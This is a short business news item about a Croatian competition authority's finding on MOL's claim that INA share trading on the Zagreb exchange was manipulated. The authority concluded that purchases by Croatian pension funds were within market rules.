MOL owns 47.15% of INA, while the Croatian state holds 44.84%.
MOL's buyout bid was aimed at the remaining 8.01% of INA shares, which remain in free float, with the intention of gaining majority control of the company. However, the Croatian government has opposed the move.
The offer made to the small shareholders by MOL expires on Friday.
MOL wants to exploit refining and petrochemical feedstock potential that it sees in IN | http://www.icis.com/Articles/2011/01/13/9425843/agency-rejects-mol-allegation-of-market-manipulation-on-ina-shares.html | CC-MAIN-2014-41 | refinedweb | 181 | 62.38 |
I see three conflicting styles of log formatting in most of the code I come across. Basically:
import logging logging = logging.getLogger(__name__) logger.info("%s went %s wrong", 42, 'very') logger.info("{} went {} wrong".format(42, 'very')) logger.info("%s went %s wrong" % (42, 'very'))
I looked at the official PEP 282 and at the official docs.
With the help of someone’s stackoverflow question I think I understand it now.
Use the first version of the three examples. So:
The actual log message with the old, well-known
%s (and
%d,
%f, etc) string formatting indicators.
As many extra arguments as you have
%s-thingies in your string.
Don’t use the second and third example, as both of them format the string before it gets passed to the logger. So even if the log message doesn’t need to be actually logged somewhere, the full string gets created.
The first example only gets passed a string and some extra arguments and only turns it into a real full string for in your logfile if it actually gets logged. So if you only display WARN level and higher, your DEBUG messages don’t need to be calculated.
There is no easy way to use the first example with
%s.
{}instead of
So: use the
logger.info("%s went %s wrong", 42, 'very') form.
(Unless someone corrects me,): | https://reinout.vanrees.org/weblog/2015/06/05/logging-formatting.html | CC-MAIN-2022-21 | refinedweb | 229 | 67.96 |
Office OpenXML becomes the technology of choice for delivering structured data on the Web, working hand-in-hand with HTML and fully complementing HTML. Consequently, we need to convert HTML to Office OpenXML at some point at work. This article mainly talks about the conversion process through a professional Word .NET library Spire.Doc.
First we need to complete the preparatory work before the procedure:
- Download the Spire.Doc and install it on your machine.
- Add the Spire.Doc.dll files as reference.
- Open bin folder and select the three dll files under .NET 4.0.
- Right click property and select properties in its menu.
- Set the target framework as .NET 4.
- Add Spire.Doc as namespace.
The following steps will show you how to do this with ease:
Step 1: Create a Word document.
[C#]
Document doc = new Document();
Step 2: Load the HTML file.
[C#]
doc.LoadFromFile("Sample.html");
Step 3: Save the HTML as the XML file.
[C#]
doc.SaveToFile("test.xml", FileFormat.Xml);
Here comes to the full C# and VB.NET code
[C#]
static void Main(string[] args) { Document doc = new Document(); doc.LoadFromFile("Sample.html"); doc.SaveToFile("test.xml", FileFormat.Xml); }
[VB.NET]
Shared Sub Main(ByVal args() As String) Dim doc As New Document() doc.LoadFromFile("sample.html") doc.SaveToFile("test.xml", FileFormat.Xml) End Sub
Preview of original HTML file.
Preview of generated Office OpenXML file.
| https://www.e-iceblue.com/Tutorials/Spire.Doc/Spire.Doc-Program-Guide/How-to-Convert-HTML-to-XML-in-C-and-VB.NET.html | CC-MAIN-2020-29 | refinedweb | 234 | 61.22 |
Python: I need to show file modification times in the "1 day ago", "two hours ago", format.
Is there something ready to do that? It should be in English.
Yes, there is. Or, write your own and tailor it to your needs.
The function (as the blog author deleted it).
def pretty_date(time=False): """ Get a datetime object or a int() Epoch timestamp and return a pretty string like 'an hour ago', 'Yesterday', '3 months ago', 'just now', etc """ from datetime import datetime now = datetime.now() if type(time) is int: diff = now - datetime.fromtimestamp(time) elif isinstance(time,datetime): diff = now - time elif not time: diff = now - now second_diff = diff.seconds day_diff = diff.days if day_diff < 0: return '' if day_diff == 0: if second_diff < 10: return "just now" if second_diff < 60: return str(second_diff) + " seconds ago" if second_diff < 120: return "a minute ago" if second_diff < 3600: return str(second_diff / 60) + " minutes ago" if second_diff < 7200: return "an hour ago" if second_diff < 86400: return str(second_diff / 3600) + " hours ago" if day_diff == 1: return "Yesterday" if day_diff < 7: return str(day_diff) + " days ago" if day_diff < 31: return str(day_diff / 7) + " weeks ago" if day_diff < 365: return str(day_diff / 30) + " months ago" return str(day_diff / 365) + " years ago" | https://codedump.io/share/ZLR4JL3ouDTC/1/user-friendly-time-format-in-python | CC-MAIN-2017-39 | refinedweb | 205 | 62.58 |
Accessing and rendering shapes
A shape is a dynamic data model. The purpose of a shape is to replace the static view model of ASP.NET MVC by using a model that can be updated at run timethat is, by using a dynamic shape. You can think of shapes as the blobs of data that get handed to templates for rendering.
This article introduces the concept of shapes and explains how to work with them. It's intended for module and theme developers who have at least a basic understanding of Orchard modules. For information about creating modules, see the Getting Started with Modules course. For information about dynamic objects, see Creating and Using Dynamic Objects.
Introducing Shapes
Shapes are dynamic data models that use shape templates to make the data visible to the user in the way you want. Shape templates are fragments of markup for rendering shapes. Examples of shapes include menus, menu items, content items, documents, and messages.
A shape is a data model object that derives from the
Orchard.DisplayManagement.Shapes.Shape class.
The
Shape class is never instantiated. Instead, shapes are created at run time by a shape factory.
The default shape factory is
Orchard.DisplayManagement.Implementation.DefaultShapeFactory.
The shapes created by the shape factory are dynamic objects.
Note
Dynamic objects are new to the .NET Framework 4. As a dynamic object, a shape exposes its members at run time instead of at compile time. By contrast, an ASP.NET MVC model object is a static object that's defined at compile time.Dynamic objects are new to the .NET Framework 4. As a dynamic object, a shape exposes its members at run time instead of at compile time. By contrast, an ASP.NET MVC model object is a static object that's defined at compile time.
Information about the shape is contained in the
ShapeMetadata property of the shape itself.
This information includes the shape's type, display type, position, prefix, wrappers, alternates,
child content, and a
WasExecuted Boolean value.
You can access the shape's metadata as shown in the following example:
var shapeType = shapeName.Metadata.Type;
After the shape object is created, the shape is rendered with the help of a shape template.
A shape template is a piece of HTML markup (partial view) that is responsible for displaying the shape.
Alternatively, you can use a shape attribute (
Orchard.DisplayManagement.ShapeAttribute)
that enables you to write code that creates and displays the shape without using a template.
Creating Shapes
For module developers, the most common need for shapes is to transport data from a driver to a template for rendering.
A driver derives from the
Orchard.ContentManagement.Drivers.ContentPartDriver class
and typically overrides that class's
Display and
Editor methods.
The
Display and
Editor methods return a
ContentShapeResult object, which is analogous to
the
ActionResult object returned by action methods in ASP.NET MVC.
The
ContentShape method helps you create the shape and return it in a
ContentShapeResult object.
Although the
ContentShape method is overloaded, the most typical use is to pass it two
parametersthe shape type and a dynamic function expression that defines the shape.
The shape type names the shape and binds the shape to the template that will be used to render it.
The naming conventions for shape types are discussed later in
Naming Shapes and Templates.
The function expression can be described best by using an example.
The following example shows a driver's
Display method that returns a shape result,
which will be used to display a
Map part.
protected override DriverResult Display( MapPart part, string displayType, dynamic shapeHelper) { return ContentShape("Parts_Map", () => shapeHelper.Parts_Map( Longitude: part.Longitude, Latitude: part.Latitude)); }
The expression uses a dynamic object (
shapeHelper) to define a
Parts_Map shape and its attributes.
The expression adds a
Longitude property to the shape and sets it equal to the part's
Longitude property.
The expression also adds a
Latitude property to the shape and sets it equal to the part's
Latitude property.
The
ContentShape method creates the results object that is returned by the
Display method.
The following example shows the entire driver class that sends a shape result to a template either
to be displayed or edited in a
Map part. The
Display method is used to display the map.
The
Editor method marked "GET" is used to display the shape result in editing view for user input.
The
Editor method marked "POST" is used to redisplay the editor view using the values provided by the user.
These methods use different overloads of the
Editor method.
using Maps.Models; using Orchard.ContentManagement; using Orchard.ContentManagement.Drivers; namespace Maps.Drivers { public class MapPartDriver : ContentPartDriver<MapPart> { protected override DriverResult Display( MapPart part, string displayType, dynamic shapeHelper) { return ContentShape("Parts_Map", () => shapeHelper.Parts_Map( Longitude: part.Longitude, Latitude: part.Latitude)); } //GET protected override DriverResult Editor( MapPart part, dynamic shapeHelper) { return ContentShape("Parts_Map_Edit", () => shapeHelper.EditorTemplate( TemplateName: "Parts/Map", Model: part)); } //POST protected override DriverResult Editor( MapPart part, IUpdateModel updater, dynamic shapeHelper) { updater.TryUpdateModel(part, Prefix, null, null); return Editor(part, shapeHelper); } } }
The
Editor method marked "GET" uses the
ContentShape method to create a shape for an editor template.
In this case, the type name is
Parts_Map_Edit and the
shapeHelper object creates an
EditorTemplate shape.
This is a special shape that has a
TemplateName property and a
Model property.
The
TemplateName property takes a partial path to the template.
In this case,
"Parts/Map" causes Orchard to look for a template in your module at the following path:
Views/EditorTemplates/Parts/Map.cshtml
The
Model property takes the name of the part's model file, but without the file-name extension.
Naming Shapes and Templates
As noted, the name given to a shape type binds the shape to the template that will be used to render the shape.
For example, suppose you create a part named
Map that displays a map for the specified longitude and latitude.
The name of the shape type might be
Parts_Map. By convention, all part shapes begin with
Parts_ followed by the name of the part (in this case
Map). Given this name (
Parts_Map), Orchard looks for a template in your module at the following path:
views/parts/Map.cshtml
The following table summarizes the conventions that are used to name shape types and templates.
You should put your templates in the project according to the following rules:
- Content item shape templates are in the views/items folder.
Parts_shape templates are in the views/parts folder.
Fields_shape templates are in the views/fields folder.
- The
EditorTemplateshape templates are in the views/EditorTemplates/
templatename folder.
For example, an
EditorTemplatewith a template name of Parts/Routable.RoutePart has its template at views/EditorTemplates/Parts/Routable.RoutePart.cshtml.
- All other shape templates are in the views folder.
Note
The template extension can be any extension supported by an active view engine, such as .cshtml, .vbhtml, or .ascx.The template extension can be any extension supported by an active view engine, such as .cshtml, .vbhtml, or .ascx.
From Template File Name to Shape Name
More generally, the rules to map from a template file name to the corresponding shape name are the following:
- Dot (.) and backslash () change to underscore (). Note that this does not mean that an _example.cshtml file in a myviews subdirectory of Views is equivalent to a myviewsexample.chtml_ file in Views. The shape templates must still be in the expected directory (see above).
- Hyphen (-) changes to a double underscore (__).
For example, Views/Hello.World.cshtml will be used to render a shape named
Hello_World,
and Views/Hello.World-85.cshtml will be used to render a shape named
Hello_World__85.
Alternate Shape Rendering
As noted, an HTML widget in the
AsideSecond zone (for example) could be rendered
by a widget.cshtml template, by a widget-htmlwidget.cshtml template,
or by a widget-asidesecond.cshtml if they exist in the current theme.
When various possibilities exist to render the same content,
these are referred to as alternates of the shape,
and they enable rich template overriding scenarios.
Alternates form a group that corresponds to the same shape if they differ only by a double-underscore suffix.
For example,
Hello_World,
Hello_World__85, and
Hello_World__DarkBlue are an alternate group
for a
Hello_World shape.
Hello_World_Summary, conversely, does not belong to that group
and would correspond to a
Hello_World_Shape shape, not to a
Hello_World shape.
(Notice the difference between "__" and "_".)
Which Alternate Will Be Rendered?
Even if it has alternates, a shape is always created with the base name, such as
Hello_World.
Alternates give additional template name options to the theme developer beyond the default
(such as hello.world.cshtml).
The system will choose the most specialized template available among the alternates,
so hello.world-orange.cshtml will be preferred to hello.world.cshtml if it exists.
Built-In Content Item Alternates
The table above shows possible template names for content items.
It should now be clear that the shape name is built from
Content
and the display type (for example
Content_Summary).
The system also automatically adds the content type and the content ID as alternates
(for example
Content_Summary__Page and
Content_Summary__42).
For more information about how to use alternates, see Alternates.
Rendering Shapes Using Templates
A shape template is a fragment of markup that is used to render the shape. The default view engine in Orchard is the Razor view engine. Therefore, shape templates use Razor syntax by default. For an introduction to Razor syntax, see Template File Syntax Guide.
The following example shows a template for displaying a
Map part as an image.
<img alt="Location" border="1" src="? &zoom=14 &size=256x256 &maptype=satellite&markers=color:blue|@Model.Latitude,@Model.Longitude &sensor=false" />
This example shows an
img element in which the
src attribute contains a URL
and a set of parameters passed as query-string values.
In this query string,
@Model represents the shape that was passed into the template.
Therefore,
@Model.Latitude is the
Latitude property of the shape,
and
@Model.Longitude is the
Longitude property of the shape.
The following example shows the template for the editor. This template enables the user to enter values for the latitude and longitude.
@model Maps.Models.MapPart <fieldset> <legend>Map Fields</legend> <div class="editor-label"> @Html.LabelFor(model => model.Longitude) </div> <div class="editor-field"> @Html.TextBoxFor(model => model.Latitude) @Html.ValidationMessageFor(model => model.Latitude) </div> <div class="editor-label"> @Html.LabelFor(model => model.Longitude) </div> <div class="editor-field"> @Html.TextBoxFor(model => model.Longitude) @Html.ValidationMessageFor(model => model.Longitude) </div> </fieldset>
The
@Html.LabelFor expressions create labels using the name of the shape properties.
The
@Html.TextBoxFor expressions create text boxes where users enter values for the shape properties.
The
@Html.ValidationMessageFor expressions create messages that are displayed if users enter an invalid value.
Wrappers
Wrappers let you customize the rendering of a shape by adding markup around the shape.
For example, Document.cshtml is a wrapper for the
Layout shape, because it specifies
the markup code that surrounds the
Layout shape.
For more information about the relationship between
Document and
Layout,
see Template File Syntax Guide.
Typically, you add a wrapper file to the Views folder of your theme.
For example, to add a wrapper for
Widget, you add a Widget.Wrapper.cshtml file to
the Views folder of your theme.
If you enable the Shape Tracing feature, you'll see the available wrapper names for a shape.
You can also specify a wrapper in the placement.info file.
For more information about how to specify a wrapper,
see Understanding the placement.info File.
Creating a Shape Method
Another way to create and render a shape is to create a method that both defines and renders the shape.
The method must be marked with the
Shape attribute (the
Orchard.DisplayManagement.ShapeAttribute class).
The method returns an
IHtmlString object instead of using a template;
the returned object contains the markup that renders the shape.
The following example shows the
DateTimeRelative shape.
This shape takes a
DateTime value in the past and returns a string that relates the value to the current time.
public class DateTimeShapes : IDependency { private readonly IClock _clock; public DateTimeShapes(IClock clock) { _clock = clock; T = NullLocalizer.Instance; } public Localizer T { get; set; } [Shape] public IHtmlString DateTimeRelative(HtmlHelper Html, DateTime dateTimeUtc) { var time = _clock.UtcNow - dateTimeUtc; if (time.TotalDays > 7) return Html.DateTime(dateTimeUtc, T("'on' MMM d yyyy 'at' h:mm tt")); if (time.TotalHours > 24) return T.Plural("1 day ago", "{0} days ago", time.Days); if (time.TotalMinutes > 60) return T.Plural("1 hour ago", "{0} hours ago", time.Hours); if (time.TotalSeconds > 60) return T.Plural("1 minute ago", "{0} minutes ago", time.Minutes); if (time.TotalSeconds > 10) return T.Plural("1 second ago", "{0} seconds ago", time.Seconds); return T("a moment ago"); } } | http://docs.orchardproject.net/Documentation/Accessing-and-rendering-shapes?NoRedirect=1 | CC-MAIN-2016-18 | refinedweb | 2,133 | 51.04 |
panda3d.core.ModelFlattenRequest¶
from panda3d.core import ModelFlattenRequest
- class
ModelFlattenRequest¶
This class object manages a single asynchronous request to flatten a model. The model will be duplicated and flattened in a sub-thread (if threading is available), without affecting the original model; and when the result is done it may be retrieved from this object.
Inheritance diagram
__init__(orig: PandaNode) → None¶
Create a new ModelFlattenRequest, and add it to the loader via load_async(), to begin an asynchronous load.
getModel() → PandaNode¶
Returns the flattened copy of the model. It is an error to call this unless done() returns true.
Deprecated: Use result() instead.
- Return type
-
isReady() → bool¶
Returns true if this request has completed, false if it is still pending. When this returns true, you may retrieve the model loaded by calling result(). Equivalent to
req.done() and not req.cancelled().
See
done(). | https://docs.panda3d.org/1.10/python/reference/panda3d.core.ModelFlattenRequest | CC-MAIN-2020-29 | refinedweb | 142 | 50.53 |
Spring Boot Hello World Tutorial
Let’s build a Hello World web application using Spring Boot. We will go through step by step to learn how to do this.
Generate A Spring Boot Project
There are multiple ways to setup a Spring Boot application. However, the easiest way to do it via Spring Initializer. Open the Spring Initializer page and add the Spring Web as dependency. While you are at it, Fill out the project metadata as per your need.
After filling the form, Hit Ctrl+Enter or click Generate to download the project template as ZIP file.
Import Project in IDE
Extract the downloaded project somewhere in your computer. After that, open Intellij IDEA -> File -> New -> Project from Existing Sources -> Select the directory where you extracted the hello world project.
After selecting, Choose Import Project from External Model -> Maven -> Finish.
You can also use Open-> Select directory -> Ok to directly load any Maven project in Intellij
For other IDEs like eclipse, VSCode etc, You can follow similar steps because a spring boot project is still a maven project.
Hello World Controller
Further, We need to add a controller that will listen and serve Hello World as response. To do that, add the below Controller to your application under the package
com.springhow.examples.helloworld.controllers.
Code language: JavaScript (javascript)Code language: JavaScript (javascript)
@RestController public class HelloWorldController { @RequestMapping("/") String helloWorld() { return "Hello World!"; } }
Spring Boot Hello World Application
To run the Spring Boot project, simply call
mvn spring-boot:run. This Maven command uses the Spring Boot Maven plugin to build and run the project.
You can also start the application from IDE by simply starting the main class
HelloWorldSpringBootApplication.
Subsequently, open the application URL (by default http://localhost:8080/) in your browser. It returns the "Hello World!" string which was hardcoded in the controller.
Summary
In short, we learned how to create and run a Spring Boot Hello World web application. The following articles may be the right path to learning Spring Boot.
Fonts
React-pdf is shipped with a
Font module that enables you to load fonts from different sources, control how words are wrapped, and define an emoji source to embed these glyphs in your document.
Fonts really make the difference when it comes to styling a document. For obvious reasons, react-pdf cannot ship a wide selection of them. That's why we provide an easy way to load your custom fonts from many different sources via the
register method.
import { Font } from '@react-pdf/renderer'

Font.register(source, { family: 'FamilyName' });
source
Specifies the source of the font. This can either be a valid URL, or an absolute path if you're using react-pdf on Node.
family
Name by which the font will be referenced in style definitions. Can be any unique valid string
import { StyleSheet, Font } from '@react-pdf/renderer'

// Register font
Font.register(source, { family: 'Roboto' });

// Reference font
const styles = StyleSheet.create({
  title: { fontFamily: 'Roboto' }
})
registerHyphenationCallback
Enables you to have fine-grained control over how words break, passing your own callback and handle all that logic for yourself:
import { Font } from '@react-pdf/renderer'

const hyphenationCallback = (words) => {
  // Iterate through words
}

Font.registerHyphenationCallback(hyphenationCallback);
Disabling hyphenation
You can easily disable word hyphenation by just returning all words as they are passed to the hyphenation callback
Font.registerHyphenationCallback(words => (
  words.map(word => [word])
));
registerEmojiSource
PDF documents do not support color emoji fonts. This is a bummer for the ones out there who love their expressiveness and simplicity. The only way of rendering these glyphs in a PDF document is by embedding them as images.
React-pdf makes this task simple by enabling you to use a CDN from which to download emoji images. All you have to do is set up a valid URL (we recommend using Twemoji for this task), and react-pdf will take care of the rest:
import { Font } from '@react-pdf/renderer'

Font.registerEmojiSource({
  format: 'png',
  url: '',
});
Protip: react-pdf will need an internet connection to download emoji images at render time, so bear that in mind when choosing to use this API
I wrote “what’s up with containers: Docker and rkt” a while ago. Since then I have learned a few new things about containers! We’re going to talk about running containers in production, not on your laptop for development, since I’m trying to understand how that works in September 2016. It’s worth noting that all this stuff is moving pretty fast right now.
The concerns when you run containers in production are pretty different from running it on a laptop – I very happily use Docker on my laptop and I have no real concerns about it because I don’t care much if processes on my laptop crash like 0.5% of the time, and I haven’t seen any problems.
Here are the things I’ve learned so far. I learned many of these things with @grepory who is the best. Basically I want to talk about what some of the things you need to think about are if you want to run containers, and what is involved in “just running a container” :)
At the end I’m going to come back to a short discussion of Docker’s current architecture. (tl;dr: @jpetazzo wrote a really awesome gist)
Docker is too complicated! I just want to run a container
So, I saw this image online! (comes from this article)
And I thought “that rkt diagram looks way easier to operate in production! That’s what I want!”
Okay, sure! No problem. I can use
runC! Go to runc.io, follow the directions, make a
config.json file, extract my container into a tarball, and now I can
run my container with a single command. Awesome.
Actually I want to run 50 containers on the same machine.
Oh, okay, that’s pretty different. So – let’s say all my 50 containers share a bunch of files (shared libraries like libc, Ruby gems, a base operating system, etc.). It would be nice if I could load all those files into memory just once, instead of 3 times.
If I did this I could save disk space on my machine (by just storing the files once), but more importantly, I could save memory!
If I’m running 50 containers I don’t want to have 50 copies of all my shared libraries in memory. That’s why we invented dynamic linking!
If you’re running just 2-3 containers, maybe you don’t care about a little bit of copying. That’s for you to decide!
It turns out that the way Docker solves this is with “overlay filesystems” or “graphdrivers”. (why are they called graphdrivers? Maybe because different layers depend on each other like in a directed graph?) These let you stack filesystems – you start with a base filesystem (like Ubuntu 14.04) and then you can start adding more files on top of it one step at a time.
Filesystem overlays need some Linux kernel support to work – you need to use a filesystem that supports them. The Brutally Honest Guide to Docker Graphdrivers by the fantastic Jessie Frazelle has a quick overview. overlayfs seems to be the most normal option.
At this point, I was running Ubuntu 14.04. 14.04 runs a 3.13 Linux kernel! But to use overlayfs, you need a 3.18 kernel! So you need to upgrade your kernel. That’s fine.
Back to
runC.
runC does not support overlay filesystems. This is an intentional design choice – it lets runC run on older kernels, and lets you separate out the concerns. But it’s not super obvious right now how to use runC with overlay filesystems. So what do I do?
I’m going to use rkt to get overlay filesystem support
So! I’ve decided I want overlay filesystem support, and gotten a Linux kernel newer than 3.18. Awesome. Let’s try rkt, like in that diagram! It lives at coreos.com/rkt/
If you download
rkt and run
rkt run docker://my-docker-registry/container, this
totally works. Two small things I learned:
--net=host will let you run in the host network namespace
Network namespaces are one of the most important things in container land. But if you want to run containers using as few new things as possible, you can start out by just running your containers as normal programs that run on normal ports, like any other program on your computer. Cool
--exec=/my/cool/program lets you set which command you want rkt to execute inside the image
systemd: rkt will run a program called
systemd-nspawn as the init (PID 1) process inside your container. This is because it can be bad to run an arbitrary process as PID 1 – your process isn't expecting it and might react badly. It also runs some systemd-journal process? I don't know what that's for yet.
The systemd journal process might act as a syslog for your container, so that programs sending logs through syslog end up actually sending them somewhere.
There is quite a lot more to know about rkt but I don’t know most of it yet.
I’d like to trust that the code I’m running is actually my code
So, security is important. Let’s say I have a container registry. I’d like to make sure that the code I’m running from that registry is actually trusted code that I built.
Docker lets you sign images to verify where they came from. rkt lets you run Docker images. rkt does not let you check signatures from Docker images though! This is bad.
You can fix this by setting up your own rkt registry. Or maybe other things! I’m going to leave that here. At this point you probably have to stop using Docker containers though and convert them to a different format.
Supervising my containers (and let’s talk about Docker again)
So, I have this Cool Container System, and I can run containers with overlayfs and I can trust the code I’m running. What now?
Let’s go back to Docker for a bit. So far I’ve been a bit dismissive about Docker, and I’d like to look at its current direction a little more seriously. Jérôme Petazzoni wrote an extremely informative and helpful discussion about how Docker got to its architecture today in this gist. He says (which I think is super true) that Docker’s approach to date has done a huge amount to drive container adoption and let us try out different approaches today.
The end of that gist is a really good starting point for talking about how “start new containers” should work.
Jérôme very correctly says that if you’re going to run containers, you need a way to tell boxes which containers to run, and supervise and restart containers when they die. You could supervise them with daemontools, supervisord, upstart, or systemd, or something else!
“Tell boxes which containers to run” is another nontrivial problem and I’m not going to talk about it at all here. So, back to supervision.
Let’s say you use systemd. Then that’ll look like (from the diagram I posted at the top):
- systemd -+- rkt -+- process of container X
           |       \- other process of container X
           +- rkt --- process of container Y
           \- rkt --- process of container Z
I don’t know anything about systemd, but it’s pretty straightforward to tell daemontools “hey, here’s a new process to start running, it’s going to run a container”. Then daemontools will restart that container process if it crashes. So this is basically fine.
My understanding of the problem with Docker in production historically is that – the process that is responsible for this core functionality of process supervision was the Docker engine, but it also had a lot of other features that you don’t necessarily want running in production.
The way Docker seems to be going in the future is something like: (this diagram is from jpetazzo’s gist above)
- init - containerd -+- shim for container X -+- process of container X
                     |                        \- other process of container X
                     +- shim for container Y --- process of container Y
                     \- shim for container Z --- process of container Z
where containerd is a separate tool, and the Docker engine talks to containerd but isn’t as heavily coupled to it. Right now containerd’s website says it’s alpha software, but they also say on their website that it’s used in current versions of Docker, so it’s not totally obvious what the state is right now.
the OCI standard
We talked about how
runC can run containers just fine, but cannot do overlay filesystems or fetch + validate containers from a registry. I would be remiss if I didn’t mention the OCID project that @grepory told me about last week, which aims to do those as separate components instead of in an integrated system like Docker.
Here’s the article: Red Hat, Google Engineers Work on a Way for Kubernetes to Run Containers Without Docker .
Today there’s skopeo which lets you fetch and validate images from Docker registries
what we learned
here’s the tl;dr:
- you can run Docker containers without Docker
- runC can run containers… but it doesn’t have overlayfs
- but overlay filesystems are important!
- rkt has overlay filesystem support.
- you need to start & supervise the containers! You can use any regular process supervisor to do that.
- also you need to tell your computers which containers to run
- software around the OCI standard is evolving but it’s not there yet
As far as I can tell running containers without using Docker or Kubernetes or anything is totally possible today, but no matter what tools you use it’s definitely not as simple as “just run a container”. Either way going through all these steps helps me understand what the actual components of running a container are and what all these different pieces of software are trying to do.
This landscape is pretty confusing but I think it’s not impossible to understand! There are only a finite number of different pieces of software to figure out the role of :)
If you want to see more about running containers from scratch, see Cgroups, namespaces, and beyond: what are containers made from? by jpetazzo. There’s a live demo of how to run a container with 0 tools (no docker, no rkt, no runC) at this point in the video which is super super interesting.
Thanks to Jérôme Petazzoni for answering many questions and to Kamal Marhubi for reading this. | https://jvns.ca/blog/2016/10/02/i-just-want-to-run-a-container/ | CC-MAIN-2017-09 | refinedweb | 1,769 | 70.94 |
On Mar 7, 8:47 pm, Raymond Hettinger <pyt... at rcn.com> wrote:
> The existing groupby() itertool works great when every element in a
> group has the same key, but it is not so handy when groups are
> determined by boundary conditions.
>
> For edge-triggered events, we need to convert a boundary-event
> predicate to groupby-style key function. The code below encapsulates
> that process in a new itertool called split_on().
>
> Would love you guys to experiment with it for a bit and confirm that
> you find it useful. Suggestions are welcome.
>
> Raymond
>
> -----------------------------------------
>
> from itertools import groupby
>
> def split_on(iterable, event, start=True):
>     'Split iterable on event boundaries (either start events or stop events).'
>     # split_on('X1X23X456X', 'X'.__eq__, True) --> X1 X23 X456 X
>     # split_on('X1X23X456X', 'X'.__eq__, False) --> X 1X 23X 456X
>     def transition_counter(x, start=start, cnt=[0]):
>         before = cnt[0]
>         if event(x):
>             cnt[0] += 1
>         after = cnt[0]
>         return after if start else before
>     return (g for k, g in groupby(iterable, transition_counter))
>
> if __name__ == '__main__':
>     for start in True, False:
>         for g in split_on('X1X23X456X', 'X'.__eq__, start):
>             print list(g)
>         print
>
>     from pprint import pprint
>     email = open('email.txt')
>     for mime_section in split_on(email, boundary.__eq__):
>         pprint(list(mime_section, 1, None))
>         print '= = ' * 30

I've found this type of splitting quite useful when grouping sections of
a text file. I used the groupby function directly in the file, when I
would have rather used something like this.

However, I wonder if it would be helpful to break that function into two
instead of having the "start" flag. The flag feels odd to me (maybe it's
the name?), and the documentation might have a better feel to it, coming
from a newcomer's perspective. Also, it would be cool if the function
took keywords; I wonder why most of the other functions in the itertools
module don't take keywords.
I wouldn't split out the keys separately from the groups. But the idea
of a flag to exclude the keys sounds interesting to me.

Thank you for giving me the opportunity to use the nonlocal keyword for
the first time since trying out Python 3.0. I hope this is an
appropriate usage:

def split_on(iterable, key=bool, start=True):
    'Split iterable on boundaries (either start events or stop events).'
    # split_on('X1X23X456X', 'X'.__eq__, True) --> X1 X23 X456 X
    # split_on('X1X23X456X', 'X'.__eq__, False) --> X 1X 23X 456X
    flag = 0
    def event_marker(x, start_flag=start):
        nonlocal flag, key
        before = flag
        if key(x):
            flag += 1
        after = flag
        return after if start_flag else before
    return (g for k, g in it.groupby(iterable, key=event_marker))
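For readers who want to try the thread's snippet, here is a self-contained Python 3 version of Raymond's original `split_on()` (the only changes are the explicit import, `print()` syntax, and joining each group into a string for display):

```python
from itertools import groupby

def split_on(iterable, event, start=True):
    'Split iterable on event boundaries (either start events or stop events).'
    def transition_counter(x, start=start, cnt=[0]):
        before = cnt[0]
        if event(x):
            cnt[0] += 1
        after = cnt[0]
        return after if start else before
    return (g for k, g in groupby(iterable, transition_counter))

# Groups begin at each 'X' (start events)...
starts = [''.join(g) for g in split_on('X1X23X456X', 'X'.__eq__, True)]
print(starts)  # ['X1', 'X23', 'X456', 'X']

# ...or end at each 'X' (stop events).
stops = [''.join(g) for g in split_on('X1X23X456X', 'X'.__eq__, False)]
print(stops)   # ['X', '1X', '23X', '456X']
```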
What is CNN in .net
Hemima
- Feb 21st, 2012
It is an object of the SqlConnection class; we can use any naming convention we like.
abhibmc
- Dec 8th, 2011
This is just a naming convention; we can also use "con" with a prefix of the database name from which we are seeking a connection.
What is the difference between ASP.Net and ASP
nirdesh gurjar
- Oct 10th, 2011
Difference between ASP and ASP.NET ASP.NET: ASP.Net web forms have a code behind file which contains all event handling code. ASP.Net web forms inherit the class written in code behind. ASP.Net web f...
Ravi kumar
- Jul 12th, 2011
ASP.NET is the successor of ASP, but it is not just an upgraded version of ASP. ASP is an interpreted language based on a scripting language like JScript or VBScript. ASP has limited development and debugging tools avail...
Comparison between two strings
Write a program to read two strings from the keyboard using readline statement and compare them ignoring the case?
Simon
- Jul 13th, 2011
Here is the answer:

using System;

namespace ConsoleApplication1
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.Write(...
What is the concept of partial class in .net2.0?
Pradeep Srini
- May 24th, 2011
Partial class is to split the class into multiple files
Rajesh Bathala
- Jun 13th, 2007
Partial class allows developers to split a class into multiple files. Ex:

public partial class A
{
    A()
    {
        /...
Server Crash
What will happen to sessions when a server crash?
vidyajnath
- Jun 23rd, 2010
If the session state service is used for session state maintenance, then even if the server crashes, the session state will not be lost, as it is not running in the same process as ASP.NET. But if in-process mode is used, then the session info will be lost.
jyotsana_rani2005
- Mar 29th, 2010
A crash (or system crash) in computing is a condition where a program (either an application or part of the operating system) stops performing its expected function and also stops responding to othe...
What is Code Access Security (CAS)?
vidyajnath
- Jun 23rd, 2010
Code access security (CAS) is a new feature provided by the .NET Common Language Runtime. CAS is a security model that lets you grant or deny execution permissions to an assembly according to its &quo...
suresh sm
- Sep 17th, 2005
Identity permissions control code access from one assembly to another. You can use identity permissions, which are a subset of code access permissions, either declaratively or imperatively
Bind GridView Column
How will you bind gridview particular column in datatable using windows application?
jsubha2009
- Jun 15th, 2010
Hope we can bind a particular column in a GridView by writing the code for the connection and data adapters (SqlConnection or OleDbConnection) and then adding the code:

GridView1.DataSource = ds.Tables[0].DefaultView;
GridView1.Columns[1].DataBind();

Try whether it works.
How does the IDE identify the properties/methods of an object when you type a dot (auto-complete)? e.g. variablename.ToString();
jsubha2009
- Jun 12th, 2010
IDE enables the property or method to be completed through Intelli Sense. It knows the classes like Forms, Buttons and their appropriate properties and methods. This it displays...
Aldo John
- Sep 5th, 2008
Dear friend, Reflection is all about reading metadata from assemblies. And this metadata is generated only while compiling. IDE's intellisense works fine even before any compilation...How it is wo...
1). what is view state? what are the pros and cons of using view state?2). what is .Net remoting?3).please write an example of declaring a function as web services?4). what is web services?
jsubha2009
- Jun 12th, 2010
View State is used to maintain the values of controls in a particular webpage during its subsequent postbacks to the same page. It is generally stored in a hidden field control. It...
rk51131
- Nov 15th, 2009
A ViewState has the details or values of the control in encrypted format. This encrypted details are passed to and fro between the requests to server and hence help in retaining the state of the contr...
How to add an additional property to a Workflow Activity in .NET?
jsubha2009
- Jun 12th, 2010
We can generate additional properties for the activities in a Workflow by using the property definitions with get and set procedures.We can add a property to a class only if the class is inherited or extended and cannot be an existing class in System namespace.
Pandian S
- Mar 3rd, 2007
Hi, in a .NET Windows application, using the IExtenderProvider interface we can add properties to existing components/controls in the container.
